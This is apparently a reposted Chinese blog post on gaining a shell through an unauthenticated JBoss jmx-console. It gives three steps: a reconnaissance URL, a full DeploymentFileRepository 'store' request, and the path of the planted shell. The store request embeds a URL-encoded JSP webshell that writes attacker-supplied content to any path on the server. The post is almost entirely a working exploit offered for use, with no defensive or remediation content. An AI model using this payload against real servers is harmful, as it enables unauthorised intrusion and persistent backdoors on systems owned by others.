jboss未授权访问Getshell

Posted websecyw

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了jboss未授权访问Getshell相关的知识,希望对你有一定的参考价值。

一、jboss未授权访问Getshell

1.jmx-console/htmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo

2./jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=AAA.war&argType=java.lang.String&arg1=wh&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%69%66%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%21%3d%6e%75%6c%6c%29%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%4f%75%74%70%75%74%53%74%72%65%61%6d%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%22%2f%22%29%2b%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%29%29%2e%77%72%69%74%65%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%74%22%29%2e%67%65%74%42%79%74%65%73%28%29%29%3b%25%3e%3c%61%20%68%72%65%66%3d%22%4f%6e%65%5f%4f%4b%22%3e%3c%2f%61%3e&argType=boolean&arg4=True

 

3.SHELL:http://localhost/AAA/wh.jsp

以上是关于jboss未授权访问Getshell的主要内容,如果未能解决你的问题,请参考以下文章

WEB中间件--Jboss未授权访问,

JBOSS未授权漏洞详细复现

JBoss未授权访问漏洞Getshell过程复现

常见未授权访问漏洞总结

jexboss工具 -- JBOSS未授权访问漏洞利用

中间件安全-jboss未授权访问